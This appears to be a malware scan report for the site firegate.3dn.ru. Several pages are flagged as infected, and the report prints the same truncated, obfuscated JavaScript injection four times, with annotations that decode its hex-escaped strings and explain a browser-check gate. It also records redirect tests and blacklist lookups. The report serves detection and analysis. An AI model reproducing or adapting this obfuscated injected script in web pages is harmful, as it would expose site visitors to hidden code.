Scanned pages/files
| Request | Server response | Status |
http://firegate.3dn.ru/news/one_piece_642_manga_one_piece_642_manga/2011-09-09-65 | 200 OK Content-Length: 52780 Content-Type: text/html | malicious |
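Malicious code - confirmed by antiviruses (see below):
```
var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x
```
(The snippet is truncated in the report; it ends in the middle of a string literal.)
Note on the visible portion: the script is gated on `navigator.taintEnabled()`, reached through the global alias `frames.nav`. This is a legacy method that not every browser implements, so the gate looks like a browser or analysis-environment check. The hex-escaped strings decode to ordinary member names: "\x64\x45\x6E\x43\x6F\x44\x45" is "dEnCoDE", "\x6C\x65\x6E\x67\x74\x68" is "length", "\x6F\x72\x64" is "ord", "\x63\x68\x61\x72\x41\x74" is "charAt", and "\x31" is "1". The long mixed-case identifiers appear to be filler names. The data passed to the `encrypt` routine lies beyond the cut, so the script's purpose cannot be determined from this excerpt. The same opening appears on every page this scan marks as malicious, which suggests (but does not prove) an injection into a shared site template rather than into individual pages.
Antivirus reports: (table empty in this copy of the report)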
http://s47.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://s47.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=4firegate | 200 OK Content-Length: 525 Content-Type: application/javascript | clean |
http://firegate.3dn.ru/js/cufon.js | 200 OK Content-Length: 18258 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/font.js | 200 OK Content-Length: 50368 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/masonry.js | 200 OK Content-Length: 3440 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/ui.js | 200 OK Content-Length: 313 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/register | 200 OK Content-Length: 39031 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
```
var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x
```
(The snippet is truncated in the report; it ends in the middle of a string literal.)
Antivirus reports: (table empty in this copy of the report)
http://firegate.3dn.ru/ | 200 OK Content-Length: 77144 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
```
var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x
```
(The snippet is truncated in the report; it ends in the middle of a string literal.)
Antivirus reports: (table empty in this copy of the report)
http://firegate.3dn.ru/news/one_piece_643_manga_one_piece_643_manga/2011-09-09-66 | 200 OK Content-Length: 52185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
```
var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x
```
(The snippet is truncated in the report; it ends in the middle of a string literal.)
Antivirus reports: (table empty in this copy of the report)
http://firegate.3dn.ru/news/one_piece_643_manga_one_piece_643_manga/ | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://firegate.3dn.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: firegate.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jul 2015 17:36:31 GMT
Server: uServ/3.2.2
Content-Length: 77144
Content-Type: text/html; charset=UTF-8
...77144 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: firegate.3dn.ru
Referer: http://www.google.com/search?q=firegate.3dn.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
Note: as shown, the two queries differ only in the Referer header, so a redirect conditioned on another request property (for example the User-Agent or cookies) would not be revealed by this comparison.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firegate.3dn.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firegate.3dn.ru/
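Result: firegate.3dn.ru is not infected or malware details are not published yet.
Note: neither blacklist lists the site, although this scan marks several of its pages as malicious. A "not listed" result reflects only what the blacklist operator has crawled and published, so it should not be read as confirmation that the site is clean.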
